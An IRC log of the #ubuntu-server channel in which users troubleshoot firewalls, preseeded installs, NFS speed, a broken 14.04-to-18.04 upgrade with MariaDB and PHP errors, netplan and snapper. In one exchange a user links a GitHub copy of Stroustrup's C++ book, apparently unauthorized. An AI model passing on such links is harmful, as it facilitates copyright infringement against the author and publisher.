<nacc> rbasak: i would rather suggest he mimic a known-working setup first
 * powersj just tried exporting versus putting it in front of the command, exporting works, other doesn't
<nacc> powersj: so at least we have a workaround
 * powersj just has to get that in a format uvt-kvm ssh likes
<nacc> powersj: yeah, something like `uvt-kvm ssh bash -c 'export ...; git ubuntu ...' ?
<nacc> powersj: not 100% on the quoting, but i think you can just use semicolons to the bash command
<nacc> rbasak: sorry if that came across rude, just pretty deep down this rabbit hole already :)
<rbasak> nacc: sorry. I appreciate that you're just trying to get a known working thing going by eliminating all other possibilities however unlikely.
<nacc> rbasak: i get the impressions snapd symlinking may do something funky too
<nacc> rbasak: because the snap application is actually a symlink to snapd always, and i wonder if snapd does something to the environment before exec'ing the underlying snapped application
<rbasak> I was just trying to indicate my opinion on likelyhood of that being an issue, rather than suggesting a different approach.
<nacc> rbasak: yep
<coreycb> beisner: ty!
<rbasak> nacc: "git ubuntu lint" seems to detach head and then complain about my head being detached :-/
<rbasak> Is this a known issue?
<rbasak> I suspect this is the type of thing you're going to tell me is already fixed in master :-/
<nacc> rbasak: LP: #1710035
<ubottu> Launchpad bug 1710035 in usd-importer "git ubuntu lint leaves you in a detached head state" [Undecided,New] https://launchpad.net/bugs/1710035
<rbasak> Thanks!
<nacc> rbasak: proposed workaround is there, need to submit it as a MP still
 * rbasak should really have gone over this earlier in the week :-/
<wretchedspirit> "leaves you in a detached headless state"
<wretchedspirit> sounds painful
<nacc> rbasak: i think the above is an ok approach (the pastebin there) until we fix lint correctly (by adding a common API) to use a copy of the repo
<nacc> rbasak: but i was hesitant to commit it if we could do that API quickly
<nacc> rbasak: thoughts?
<nacc> rbasak: the last hunk in that patch i'm pushing to master shortly (it's a bugfix)
<rbasak> nacc: I'd like to defer going in to this right now please. I need to get my demo sorted still :-/
<nacc> rbasak: ack
<nacc> powersj: i've got a set of fixes for master, that should make pylint-3 clean and the snap should be correct -- let me know if the jenkins job is ready to go and i'll propose it
<powersj> nacc: it is ready to go
<nacc> powersj: ok, thanks
<powersj> pushed a few minutes ago
<profall> Stock UFW makes DNS and everything else not work.
<lordcirth_work> profall, I have never gotten ufw to do anything useful.  I like shorewall
<sdeziel> profall: care to pastebin iptables-save for further investigation?
<profall> https://bpaste.net/show/7c6f1338dc25
<sdeziel> profall: nowhere the UFW chains are jumped to so UFW seems to do nothing on your machine
<profall> dig and ping work with ufw disabled, and do not work with it enabled.
<sdeziel> profall: and your INPUT chain doesn't accept ESTABLISHED connections which probably explains why DNS isn't working
<sdeziel> something must have remove rules from the INPUT chain
<sdeziel> could be fail2ban, Docker or something else
<sdeziel> can you share an iptables-save from the working case?
<profall> Sure, one moment
<profall> https://bpaste.net/show/749693829558
<sdeziel> so no wonder it works, because now INPUT has an ACCEPT policy
<sdeziel> when UFW starts, it probably turns it to DROP
<sdeziel> you'll have to find what deleted the INPUT rules that makes UFW work
<profall> https://bpaste.net/show/f5807cd7a354
<sdeziel> I'd be tempted to try "MANAGE_BUILTINS=yes" and see what gets added to the INPUT chain
<profall> Ok
<sdeziel> this will probably blow away the docker/f2b stuff but you can always restore those back
<profall> I have IPMI of the server so not worried about getting locked out.
<profall> ok
<sdeziel> please share the iptables-save after setting MANAGE_BUILTINS=yes
<sdeziel> this way, we'll be able to assemble something working even with UFW enabled (or at least try)
<profall> https://bpaste.net/show/7e83bb10ad34
<profall> I originally wanted to use UFW because I didn't want a complicated firewall :-)
<profall> If there is something else you recommend I will use it.
<profall> Docker containers work as long as I open the port now on UFW. Which is how it should be anyway.
<sdeziel> profall: this ruleset should work: https://paste.ubuntu.com/25492062/
<sdeziel> profall: and you can set MANAGE_BUILTINS to no
<profall> Ok! thank you sdeziel
<sdeziel> if that works, I don't know if it will survive a reboot though
<nheath> hi, i
<nheath> i'm trying to set up an automated install, by editing a seed file in an iso.. ive also been playing with kickstart files.. from what i can tell, my preseed file isnt being applied at all
<nheath> i have an isolinux.cfg menu entry with the following append line
<nheath> append file=/cdrom/preseed/ubuntu-server-attendless.seed debian-installer/locale=en_US console-setup/ask_detect=false console-setup/layoutcode=us noprompt vga=788 initrd=/install/initrd.gz quiet ---
<nheath> none of those parameters, nor the stuff in my preseed are applying.. am i missing something? i can also pastebin the seed file, if this is the right channel
<powersj> nheath: I've always found the initrd method of injecting a preseed more reliable. In either case, seeing what /var/log/syslog in the installer is saying is helpful to see if it found a preseed or not.
<powersj> There is also this doc on preseeding https://help.ubuntu.com/lts/installation-guide/amd64/apbs02.html
<maxb> It's been a long time since I last worked with this, but I vaguely recall the preseeding parameters being separated from the rest of the kernel parameters?
<powersj> Can check out https://wiki.debian.org/DebianInstaller/Preseed/EditIso about hacking the initrd
<maxb> Actually, never mind about what I said, I was thinking of the marker to control which ones get copied into the installed bootloader config
<nheath> powersj: thanks, ive been reading those docs.. i think im starting to understand the ven of ubuntu vs debian vs kickstart support etc..
<nheath> i can look into editing initrd, though it looks a little messier.
<nheath> how do you see the syslog when youre in the installer? i can hit f6 and see the boot options are at least applied correctly on the menu
<powersj> nheath: change over to one of the consoles, activate it (hit enter) and look at /var/log/syslog
#ubuntu-server 2017-09-09
<rizonz> meh, a / of 10G with /var /usr/ /home and so on seperate is not enough anymore these days
<patsToms> morning, I am trying to set my clock to one at timeserver
<patsToms> the problem is with startup. When system runs with wrong time, ntp will never sync with time servers because of big difference
<patsToms> is there any tool which I can give just a timeserver's hostname or whatever and it will just set time from it?
<ashd> patsToms: ntpdate
<patsToms> ashd, i can't fix my time with ntpdate when it is far from time which is at timeserver
<patsToms> when I use ntpdate -s server, it just leaves me with the old one, which is wrong
<RoyK> patsToms: is this a vm?
<patsToms> no, i found this situation everywhere. Sometimes even at my desktop.
<patsToms> because pc was a long time without a power
<RoyK> chrony may be better than ntpd in such cases
<RoyK> it allows for more drift
<RoyK> ntpd can be configured to it too, but chrony isn't doesn't care too much, it just sets the time
<nheath> //
<nheath> \quit
<Bilge> How do I renegerate the /etc/network/interfaces file?
<fishcooker> how about https://help.ubuntu.com/lts/serverguide/network-configuration.html, Bilge
<Bilge> How can I just specify that an interface should be bought up with the default IPv6 Link address?
<maxb> I've not used ipv6 for real, but does the seemingly obvious option in the interfaces manpage not work?
<Bilge> Took me most of the day to figure out I just needed: iface enp0s8 inet6 manual
<RoyK> Bilge: network config is basically the same for both stacks or whatever protocol
#ubuntu-server 2017-09-10
<Pinkamena_D> Hello, I am having some performance issues with my NFS mount. Server is 14.04 and client is 17.04 I am trying to take a backup of the client using backintime program. The client has a 1tb ssd to backup and the server saves this to a 4tb 5400 HDD. The process starts out at a good 200+ mbps but after about 15 minutes or so drops to ~50kbps which will make it take many days to finish. I used to perform the backup using SFTP with the same setup
<Pinkamena_D> however the CPU usage on the server for the sshd process was becoming a bottleneck. The speed was much better than this though. With the NFS there does not seem to be a cpu or disk bottleneck on either machine. I have tried the async mount option. Any other immediate suggestions what could be wrong?
<Pinkamena_D> Also both computers with gigabit cards are connected to one gigabit router in the middle in a home LAN
<RoyK> Pinkamena_D: check iops usage
<RoyK> Pinkamena_D: usually nfs is sync, meaning it requires a committed write to the drive before something else can go on
<RoyK> Pinkamena_D: you can export/mount it as async, it'll help a lot for speed, but you might lose data in case of a power loss
<Pinkamena_D> yeah, I have tried to use async but it does not seem to help much
<RoyK> try to monitor disk I/O
<RoyK> something like munin is nice
<RoyK> or sysstat
<RoyK> sysstat is easy - just install it and enable it - munin is a web thing and may take a wee bit of more effort
<RoyK> I'd recommend trying munin, though
<RoyK> it'll probably take half an hour to get some useful data out from it, since it only runs every five minutes
<Pinkamena_D> I can see disk IO in glances - just trying to rm the files now, I get about 1.5M read and 0 write.
<RoyK> Pinkamena_D: https://munin.malinux.no/
<Pinkamena_D> running the command on the server itself is much faster
<RoyK> anything in dmesg?
<RoyK> run dmesg -T | pastebinit
<Pinkamena_D> theres no errors
<Pinkamena_D> heres a few lines that are relevant: https://bpaste.net/show/1c325288d9a0
<Pinkamena_D> One other thing I can think of, though I dont think it should be this drastic, is that I am using btrfs
<RoyK> not sure if it's relevant. but again, I'll use btrfs when it's stable as in stable, same thing goes to visiting the US, I'll go there again when it's a working democraty there. Nonoe of those seem to happen very soon
<pankaj> I copied a file to my pendrive using command line. I noticed that if I had copied using the graphical interface then it would have been a lot more faster. What is the reason?
<pankaj> I copied a file to my pendrive using command line. I noticed that if I had copied using the graphical interface then it would have been a lot more faster. What is the reason?
<pankaj> ping
<pankaj> pingit
<pankaj> I copied a file to my pendrive using command line. I noticed that if I had copied using the graphical interface then it would have been a lot more faster. What is the reason?
<pankaj> Hello.
<pankaj> I copied a file to my pendrive using command line. I noticed that if i had copied using graphical interface then it would have been a lot more faster. What is the reason?
<pankaj> Hello. Is anybody there?
<pankaj> I coied a large file to my pendrive using command line. I noticed that the process of copying was very slow as compared to that if I had done in command line. Why?
 * RoyK waes
 * RoyK waves
<RoyK> pankaj: it doesn't help to repeat the question ;)
<RoyK> !patience
<ubottu> Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or http://ubuntuforums.org or http://askubuntu.com/
<RoyK> pankaj: do you have a GUI on your server?
<pankaj> RoyK: I am using desktop version.
<pankaj> RoyK: I was doing it for fun and noticed that it was copying too slow. What might be the reason?
<RoyK> no idea, I don't use a GUI for moving large data
<pankaj> RoyK: Is this due to different file system? But I have never noticed it before.
<RoyK> if it's faster on the commandline, no
<RoyK> the GUI is just a wrapper
<pankaj> RoyK: I was just asking that when I was copying the file why it was slow ( I did it using command line). I just wanted to know that what might have been the reason for this?
<RoyK> pankaj: ok, it's slow on the commandline?
<pankaj> RoyK: Yes, It was slow in command line. If I had done on GUI then I would have done faster.
<pankaj> RoyK: I know that GUI is just a wrapper so that is why I am asking that why it was slow in cmd instead.
<RoyK> pankaj: no, it wouldn't. the gui would definetely not be faster, probably slower, because of the overhead, but then, the gui may have some buffering
<RoyK> so if you copy something over to that usb thing and then unmount it, perhaps you'll see it'll be sitting quite a while before it's unmounted
<pankaj> RoyK: I told you that what it was noticing.
<pankaj> RoyK: Somebody told me told me that the problem may have been due to buffering.
<RoyK> what? the whole process being slower on the commandline compared to the gui including umounting or syncing in the gui?
<pankaj> RoyK: Just copying the file was slower.
<RoyK> I don't know what fancy styff they add in the gui to make things more comfortable, but it's not related to an ubuntu server
<RoyK> pankaj: the I/O speed is the same
<pankaj> RoyK: OK. what is the use od sync command
<RoyK> man sync
<RoyK> but seriously, there's no way a gui can speed up disk I/O compared to the commandline
<pankaj> RoyK: ok
<RoyK> I work a lot with linux and data storage and have done so for 20+ years, a fancy gui doesn't speed things up
<RoyK> it may have buffering, though, which makes things look and feel faster, which is good in a desktop environment
<RoyK> backgrounding the writing to the device
<pankaj> RoyK: I wanted to learn C++ in linux but it is very different from what I did in windows world . Is their any good book or any good resource that you would suggest me for c++ in linux or some tips will be helpful.
<RoyK> c++ is the same all over, it's just different libraries
<RoyK> but C++ is the same across all platforms
<pankaj> RoyK: Please sir any tips for it in linux world and where to find help for it for learing purposes. perhaps some of the best books you suggest.
<RoyK> for c++?
<pankaj> RoyK: Yes. I want to learn because I love programming. ABsolutely in favour of open source in this way.
<RoyK> google is usually a fine place to start ;)
<pankaj> RoyK: I know but sometimes I get mixed with so much resources and ideas.
<RoyK> Bjarne Stroustrup's books on C++ are good
<RoyK> seems "the bible" is available online now, for free, if I'm not mistaken https://github.com/BestSonny/materials/blob/master/The%20C%2B%2B%20Programming%20Language%20%5B4th%20Edition%5D%20-%20Bjarne%20Stroustrup.pdf
<pankaj> pankaj: I read that book and I also used to practise a lot in my highschool. But beyond the basics I want to learn more.
<pankaj> RoyK: I have learned till pointers and file handling and pointers.
<RoyK> pankaj: Bjarne Stroustrup designed C++ ;)
<pankaj> RoyK:  Thanks for the link. I wanted to learn more but many books in c++ end after pointers, file handling, classes and inheritance. What after that?
<RoyK> just read that book - it's long, but thorough
<pankaj> RoyK: OK.
<pankaj> RoyK: I want to tell you something.
<RoyK> go on :)
<pankaj> I dropped out from the collage 1 and half year ago because I love programming and I was sure that I could not learn it in the best way if I study there because programming and collage admissions has become busness here.
<pankaj> pankaj: I love programming and really want to learn more about languages like c++ and web development. I have studied from many of the possible sources available free on the internet. So, I think that you can help me and guide on how can I study better.
<RoyK> c++ for web?
<pankaj> RoyK: No, I my extra time I learn HTML, CSS, bootstrap etc. But I am really interested in System like linux. I want to learn c++ mainly and want to help open source society by what I learn.
<RoyK> nice
<pankaj> pankaj: Just wanted a guide.
<RoyK> keep in mind that a lot of OSS stuff on linux are written in C
<RoyK> not C++
<pankaj> RoyK: OK. So, I have already learn the basics of c. I will surely practise more day and night to improve. But I do not know that how to get in the world of real development. A lot of this stuff is hidden from the basics that we used to do in schools.
<pankaj> RoyK: I wanted to learn more then these file handling and pointers.
<pankaj> RoyK: Hello
<pankaj> I know that how to make small programs specially in linux by placing the file in /usr/local/bin and executing directly as on the path. But I want to learn more.
<RoyK> pankaj: there's a lot of sources for learning things online - just google it - scripting bash etc
<pankaj> RoyK: Hello
<pankaj> RoyK: Hello
<ybaumy> moin
<else-> trying to use the ubuntu cloud image in virtualbox. can anyone tell me how to instrument cloud-init in order to set a password? i tried adding a floppy disk with user-data, but it doesn't seem to take effect.
<else-> ah, so apparently floppy disk does not work and i need to use a disk instead.
<gunix> my first ubuntu server tutorial is done: https://help.ubuntu.com/community/HALAMP
<gunix> i feel proud :D
<ducasse> gunix: fyi, that would belong in #ubuntu-discuss or #ubuntu-offtopic, not in the support channels
<gunix> ducasse: thank you. i didn't know #ubuntu-discuss exists. what's the differance between discuss and offtopic?
<ducasse> gunix: in practice, not much :)
<Kyoku> Can anyone help with this please? http://paste.ubuntu.com/25510458/ my /boot is full and I can't purge old kernels
<Ussat> https://askubuntu.com/questions/89710/how-do-i-free-up-more-space-in-boot
<med_> jamespage, dosaboy good to see you guys are out and about enjoying the Mile High City.
<med_> Welcome.
<Kyoku> Ussat none of those methods are working
#ubuntu-server 2018-09-03
<cpaelzer> good morning
<timyp>  does anyone know how a script or of anyway to have iperf send an email alert when a transfer takes a certain amount of time, for example lets say sending 5GB takes < than 5 mins than email? I'm runing 16.04 and system can already send email using sendmail (emails are send when cronjobs a ran) and I'm running iperf 2.0.5
<timyp> I also use monit but can't seem to find an option for > < (greater than less than) alerts.
<TvL2386> hey guys, I'm using ubuntu 18.04 and am trying to play with bonding. I notice that adding a bond to netplan works fine, removing a bond from netplan does not work at all (nothing happens) and setting the mtu on the physical interfaces and/or the bond does not work either
<TvL2386> timyp: I don't think iperf has such a feature. I'd do it differently
<TvL2386> timyp: I would place a file of X megabyte somewhere on a webserver. I'd then do: `timeout 30s wget -O /dev/null http://example.com/the_file || echo 'this took way too long' | sendmail`
<timyp> good thinking
<TvL2386> you can tinker with filesize and timeout to choose the acceptable speed. If it falls below, you'll get a mail
<TvL2386> thank you ;)
<TvL2386> I like the idea and configuration of netplan, I just feel it's buggy as hell
<TvL2386> I added "match:\n  macaddress: 00:11:22:33:44:55" to my ens1f1 interface, did `netplan apply` and now it's called eth0
<TvL2386> and interface ens1f1 is gone
<TvL2386> possibly/probably something to do with: https://bugs.launchpad.net/ubuntu/+source/nplan/+bug/1746419
<ubottu> Launchpad bug 1746419 in nplan (Ubuntu) "bond parameters are not changed by 'netplan apply'" [Undecided,Confirmed]
<linuxperia> Hi all. I upgraded Ubuntu server from Xenial 14.04 to 18.04 yesterday and a lot of things do not work anymore. Website are broken becouse like errors like this that did not appeared before => "PHP Fatal error:  Uncaught Error: Call to undefined function geoip_country_code_by_name"
<linuxperia> Can somebody help me with this problem ? What could be the Problem ? I have installed geoip. It is in apache2 modules enabled. => "loaded Modules: geoip_module (shared)"
<linuxperia> this should not happen ! Did Ubuntu Server downgraded geoip and deleted by this the existing working function ?
<TvL2386> linuxperia: I'd check what php version you had on 14.04 and which one you ended up with in 18.04
<TvL2386> linuxperia: also check the geoip module for versioning
<TvL2386> I think you went from 5.x to 7.y
<TvL2386> probably there are breaking changes which you are experiencing at the moment
<TvL2386> which is to be expected!
<TvL2386> 18.04 != 14.04
<TvL2386> if you want stability and no breaking changes, stick to 14.04
<linuxperia> Hi TvL2386: thanks a lot for your fast answer. well there is no way back anymore! i need fix this problems asap. MySQL is broken too. Used MariaDB 10.2 before and after upgrade to 18.04 it got downgraded and now i cant install even mariaDB 10.2 baack. Its a hell at the moment
<TvL2386> really sorry to hear that linuxperia, but this was to be expected. I'm actually really surprised that you went this path...
<TvL2386> linuxperia: you should have tested this upgrade path before doing it
<TvL2386> and having a rollback scenario (I like offline vm snapshots) is also very good
<TvL2386> for mariadb, you should check out there site. There is a ubuntu ppa I think that allows you to install different versions
<linuxperia> why ? i thinked 18.04.01 is good for upgrade. The whole Upgrade Process is for sure a joke! it deletes packages that are needed and replace it with old packages that do not work. The Upgrade process should be smart enogh to stop when it see that it want install older packages and stop with error message instead break whole working server. I really think subscribe to RedHat Debian/Ubuntu is a joke lately. Cant even install MariaDB 10.2 to use
<linuxperia> my DataBase at the moment with 18.04
<TvL2386> if you can: I'd restore a backup, because you don't know how long it will take you to fix this assuming you can fix it... Probably changes in the website code are required to accomodate the new versions of php and geoip
<TvL2386> linuxperia: packages are not replaced by old packages that do not work
<linuxperia> yes need new programming fo the scipts. one day this hit did with MariaDB i had installed 10.2 and it deleted it with 10.1 10.2 is not existent in 18.04
<TvL2386> so in 14.04 you had mariadb 10.2
<linuxperia> yes in 14.04 i had 10.2 as i needed replication for several servers then did the ubuntu upgrade and it just installed MariaDB 10.1 and removed my Database folder /var/lib/mysql where all my data was and created a new /var/lib/mysql. At least it was smart enogh to create a copy of the existing DB before it created a new one
<linuxperia> I have lost nearly all my nerves after this upgrade
<linuxperia> expected be a 1 Hour work. Now its a total pain. Asking me since hours if i should switch to RedHat. i am 100% sure with redhat this would not have happened
<linuxperia> and i am a paing Ubuntu Server Cloud Customer with monthly bills above 150 USD
<linuxperia> aka i support cannonical
<TvL2386> linuxperia: I'm checking at the moment, but I don't think mariadb-server 10.2 is present in 14.04
<TvL2386> linuxperia: I expect that testing your upgrade will take you a couple of hours
<TvL2386> linuxperia: and I expect the actual migration to 18.04 to take days
<TvL2386> all system packages are updated
<linuxperia> i did installed MariaDB from the official repository website of mariadb aka used external repository. There was a message while upgrade that external repositorys will be disabled
<TvL2386> you installed mariadb 10.2, while 14.04 comes with mariadb-server-5.5
<TvL2386> which means you installed from ppa
<TvL2386> ppa for trusty
<TvL2386> which is disabled or not working by the upgrade
<TvL2386> and what you call "official repository website of mariadb" has nothing to do with ubuntu
<linuxperia> es exactly but ubuntu should be smart enogh to see i have a newer DB and stop installing Old DB that is incompatible and destroy my database this for sure is a joke
<TvL2386> well linuxperia, sorry to say it but your upgrade plan is a joke
<TvL2386> because the plan is: there is not plan: just `os-release-upgrade` and YOLO
<TvL2386> good luck to you sir
<linuxperia> yes that was my plan and i dont know any other :-)
<linuxperia> i need luck and yes lot of nerves thanks for your good wishes
<TvL2386> hehehe... yeah you should have tested this before in a test environment... That's the other plan
<TvL2386> the only good plan imho
<TvL2386> and always have a foolproof rollback plan
<TvL2386> if you have, you won't have nerves :)
<TvL2386> btw: this advice is distro independent
<linuxperia> yes at the end when everything is broken i got smarter now too. Should have done it the otherway around but till yet did not had such problems so expected only minor problems. well okey need solve this php geoip problem PHP Fatal error:  Uncaught Error: Call to undefined function geoip_country_code_by_name
<tomreyn> linuxperia: if you have apaid support plan, you should probably turn to coimmercial support to get help with this upgrade.
<tomreyn> they may be more motivated to support you than us volunteers are around here
<tomreyn> (i don't know whether commercial support is part of your current contract)
<tomreyn> https://stackoverflow.com/questions/10821974/how-to-make-geoip-country-name-by-name-work is the first hit on a web search for "Uncaught Error: Call to undefined function geoip_country_code_by_name"
<TvL2386> that's issue #1 of #??????
<tomreyn> it is common that you will need to make application level code changes when upgrading your linux distribution (and it does not matter which distribution it is)
<TvL2386> rollback rollback
<tomreyn> i'm unlreated to TvL2386 and, like anyone doing linux sysadmin for a couple years would probably have done, i'd told you the same had you asked before initiating the upgrade: be sure you have complete, current backups, and a rollback scenario. test and prepare for (application changes, configuration file changes, service migrations) the upgrade on (a) separate system(s) before you do it live.
<tomreyn> this is just common practice.
<ogra> ... andf do not foirget that you need to upgrade 14.04->16.04->18.04 ... else you ask for a mess (do-release-upgrade surely takes care for a lot of data and package transitions, but only between two LTS releases, you should never skip one)
<tomreyn> when planning the next releas eupgrade (and maybe generally, too), take a look at the documentation, too, since it would also point out how to prepare for an upgrade.
<linuxperia> i have Ubunutu Server on the Google Cloud which is a canonical product. Paying my google Cloud Bills since years using only ubuntu server to support canonical and the developers. Not sure what the commercial support by canonical is. never seen it. would be good having something like this. i did maked a search already yesterday related to this strange php error. yes its distro unrelated true. but solving it on ubuntu is really painfull. there
<linuxperia> is no really anywhere a solution. the one is from 2015. aka nearly 3 Years old.
<Skuggen> Which MariaDB version is in 18.04? Odd that it would downgrade
<linuxperia> Skuggen i have instaled MariaDB 10.2 on 14.04 becouse i needed a distributed DB Replication then after upgrade of my ubuntu server to 18.04 ubuntu downgraded the DB from 10.2 to 10.1 and deleted the database as 10.2 does not exist in 18.04
<Skuggen> Ubuntu doesn't downgrade the package unless some other installed package depends on MariaDB in a way MariaDB's packages can't satisfy
<Skuggen> Hm, are you sure it deleted the database? I think MariaDB packaging has some logic for copying it to a different location if it finds incompatible versions
<Skuggen> Is there a /var/lib/mysql-10.2 or similar?
<TvL2386> ubuntu 18.04 has mariadb 10.1 in the standard repositories
<linuxperia> well for sure it did as i used the mariadb ppa for trusty and this ppa was disabled in bionic while the upgrade aka was non existent. think it just did mariadb-client mariadb-server upgrade and replaced the binaries then the configuration window poped up and told me that i will replace the existind db yes i have a moved db. problem is i can not even install now MariaDB 10.2
<TvL2386> but linuxperia has used the mariadb ubuntu ppa to get 10.2 on his system
<tomreyn> maybe just use their ppa again then?
<ZPQ> linuxperia: how can you even think about uppgrading a OS without full backup and rollback plan?
<linuxperia> tomrey: trying since hours to use their ppa for bionic but for some strange reason i cant install MariaDB 10.2 anymore on 18.04 It brings this error message here always! "sudo apt-get install mariadb-client-10.2 mariadb-client-core-10.2 mariadb-server-10.2 mariadb-server-core-10.2 FÃ¼r Paket Â»mariadb-server-10.2Â« existiert kein Installationskandidat"
<linuxperia> its total strange. apt see the package but it cant install it. i dont know what to do anymore. this problems should not happen. i follow all the steps add the ppa do apt updata and then a simple apt install but it just wont install anymore my existing MariaDB 10.2 on 18.04
<linuxperia> here is the Paste Bin of the Output => https://paste.ubuntu.com/p/qWJ94p9kmC/
<tomreyn> linuxperia: this is the commercial support offering i had was discussing https://www.ubuntu.com/support
<tomreyn> mariadb (since you're using their software repository) also offers commercial support.
<linuxperia> yes i even donated money to them. will need check out their offer. think they can not help me however when ubuntu refuses to install the MariaDB 10.02 on 18.04 as this is ubuntu Server related and not really MariaSB related. its strange the i get this error whenever i try install MariaDB on 18.04
<linuxperia> The following packages have unmet dependencies:
<linuxperia>  mariadb-server : Depends: mariadb-server-10.2 (>= 1:10.2.17+maria~bionic) but it is not installable
<linuxperia> E: Unable to correct problems, you have held broken packages.
<linuxperia> i dont have any broken packages however
<linuxperia> and i follwed thos official install guide here https://downloads.mariadb.org/mariadb/repositories/#mirror=host-europe&version=10.2
<linuxperia> thanks for the support link will go check it out
<linuxperia> tomreeyn: looks like that support is only availble for main packages. not sure what is possible at all with such a limites offer. Support for MariaDB 10.2 on ubuntu 18.04 installation will be clearly not covered by this offer
<tomreyn> linuxperia: which is why i suggested you also look into mariadb support, if you prefer using their packages.
<tomreyn> note that thereis also #mariadb aroun dhere, i think
<linuxperia> yes thank you very much tomreyn. i appreciate your help effort.
<tomreyn> linuxperia: you're welcome, good luck.
<ahasenack> good morning
<CarlenWhite> Was thinking to myself on if it makes more sense to have a folder location binded instead of syslinked
<CarlenWhite> Kinda makes sense in my head. You'd have all your links defined in the /etc/fstab
<CarlenWhite> Instead of checking each directory and inspecting if a symlink was used.
<tomreyn> and maybe it's just yak shaving. it probably depends on your needs / use case.
<CarlenWhite> Yak shaving?
<tomreyn> https://en.wiktionary.org/wiki/yak_shaving
<CarlenWhite> And I suspect it'd make the most sense for important folders like /var if it's really somewhere else on the system. Fails a bit more gracefully with the system entering single user mode.
<CarlenWhite> Ah, yeah I suppose it's me thinking about useless stuff.
<CarlenWhite> Well, something less useless: What happens if a formated block device expands? Think /dev/my-block-device formated as ext4 has expanded 1gb. Does it just work and the space is instantly usable or does stuff break?
<tomreyn> CarlenWhite: resizing block devices is not usually the same as resizing file systems, althought there are some utilities which will / can do this in just one go.
<CarlenWhite> That's what I figured. I'm messing with zfs's zvols which gives you block devices and they can be resized, but I've been bubblewrapping the data by partitioning.
<ahasenack> hm, snapper upstream: "Latest commit d610a3a  on Jul 25"
<ahasenack> not promising
<tomreyn> does it do ext4 by now?
<ahasenack> tomreyn: they say this in the manpage: "Supported filesystems are btrfs and ext4 as well as snapshots of LVM logical
<ahasenack>        volumes with thin-provisioning. Some filesystems might not be supported depending on your installation.
<ahasenack> "
<tomreyn> thanks ahasenack, so i guess their faq is outdated: http://snapper.io/faq.html -> "Does snapper support ext4? - Yes, but only experimentally and you need a special kernel and e2fsprogs. For more information see the next4 project."
<ahasenack> well, don't know
<ahasenack> ext4 is not something I would think of when dealing with snapshots
<tomreyn> you use xfs?
<RoyK> last I checked, xfs can't do snaps either
<tomreyn> or lvm with thin provisioning? i think i spotted you discuss LVM2 snapshots on 'normal' LVs vs thin provisioned LVs a while ago.
<RoyK> nor anything else, except btrfs and zfs
<RoyK> and lvm of course, but that's dead slow
<RoyK> btrfs is ok, for a while, but only just
<RoyK> zfs just works
<tomreyn> RoyK: i think snapper isn't meant to control snapshotting for file systems which already support it but for doing it on file systems which dont do it natively.
<ahasenack> tomreyn: zfs
<tomreyn> i see
<ahasenack> but I don't use snapper
<ahasenack> I'm just fixing a bug there
<ahasenack> it's failing to build in ubuntu
<tomreyn> oh, and probably on a current ubuntu release, which the travis ci builds wouldn't know about.
<tomreyn> hmm their travis ci builds run on 17.10
<ahasenack> I submitted a patch
<ahasenack> https://github.com/openSUSE/snapper/issues/424
<ahasenack> no idea if someone is watching that, though
<ahasenack> given the last commit was months ago
<tomreyn> here it's Sep 3, which is less than 6 weeks since Jul 25
<RoyK> tomreyn: seems it controls snapshotting for lvm and btrfs
<ahasenack> cpaelzer: is the importer still catching up?
<cpaelzer> ahasenack: yep
<cpaelzer> still running
<cpaelzer> let me scroll up to get a feeling on the overall load
<cpaelzer> I see this known issue passing by "User is suspended: ~python-modules-team'""
<cpaelzer> ahasenack: 59 done, there is no preview how much more will follow
<ahasenack> ok
<TvL2386> never heard of snapper, but reading this: http://snapper.io/overview.html makes me very much interested
<TvL2386> snapshots of ext4 filesystems????????
<TvL2386> what are the caveats
<TvL2386> snapshot ; apt-get update && apt-get dist-upgrade -y ; and rollback if it failed????????????
<RoyK> TvL2386: sounds strange - ext4 doesn't have any support for snaps
<TvL2386> RoyK: yeah I totally agree. I'm really curious how they have implemented it
<TvL2386> gonna check the source
<RoyK> TvL2386: I guess lvm snaps
<RoyK> and some hooks in ext4 to sync before the snapshot is taken
<ahasenack> openvpn is such a pain to setup :/
<cpaelzer> ahasenack: yep
<cpaelzer> I'll optimize the steps a bit
<ahasenack> cpaelzer: have you seen this? https://github.com/FiloSottile/mkcert
<ahasenack> looks easier than easy-rsa
<cpaelzer> I tought I have read about it, but find nothing in my history
<cpaelzer> maybe the name is similar to something else I touched
<tomreyn> wireguard to the rescue!
<cpaelzer> ahasenack: given what flies by in the log there are plenty of packages that are prevented to import by that 410 error of the deleted team
<ahasenack> :/
<ahasenack> and the fix is to just ignore that error
<ahasenack> cpaelzer: I'm fetching pkg every 5min or so, still no update for snapper
<ahasenack> the backlog must be big
<cpaelzer> yep
<cpaelzer> it has all of the "rush into cosmic" phase
<cpaelzer> you might remember the discussion when I asked if rbasak usually keeps the log open to check
<cpaelzer> and the answer was no so I did the same
<cpaelzer> it seems two days after it failed hard enough to stop
<cpaelzer> there are import fails (fine) but the bad ones are those which kill the watch/loop to import
<ahasenack> this definitely has to change
<ahasenack> not you looking at it daily, no :)
<cpaelzer> yeah, including a trivial status page
<ahasenack> it should become a real service
<ahasenack> as we depend on it
<cpaelzer> like published on LP on colum #1, imports on column #2 with status
<ahasenack> cpaelzer: hm, snapper is not in the whitelist, it won't get (re)imported automatically
<ahasenack> cpaelzer: can you run it on the side?
<cpaelzer> heh
<cpaelzer> yeah
<ahasenack> cpaelzer: got it updated, thanks
<cpaelzer> yw
<cpaelzer> ahasenack: I was still wondering why it touched so much
<cpaelzer> I saw like 20 versions import
<cpaelzer> but I'd have expected only 1 new
<cpaelzer> ahasenack: when you fetched that did it mark all branches as forced-update?
<ahasenack> no
<cpaelzer> due to any import accident?
<cpaelzer> hmm
<cpaelzer> maybe it has to pass all old upload always
<ahasenack> cpaelzer: this was the output: https://pastebin.ubuntu.com/p/35SqT62v3S/
<cpaelzer> I remember nacc takling about noting somewhere where to pick up next time to speed things up
<ahasenack> it was manually imported for the first time last week
<cpaelzer> could be related
<ahasenack> it's in universe, so we didn't have it yet
<cpaelzer> but last week to this week should not be that much IMHO ahasenack: http://paste.ubuntu.com/p/scfMKBbw7k/
<ahasenack> no clue
<cpaelzer> I'd expect like 1x fetch what it already has - then jumping to the only new one from the publish history
<cpaelzer> I did not run --no-fetch on this
<cpaelzer> ahasenack: if you added a topic to the sprint you might add this pastebin as well
<ahasenack> I can, sure
<mybalzitch> fresh install of 18.04, apparently I'm using netplan. I have to log in and sudo netplan apply for my network to work after a reboot, what am I doing wrong
<tomreyn> mybalzitch: does syslog tell?
<mybalzitch> https://askubuntu.com/questions/1019146/netplan-does-not-apply-at-startup I think its that
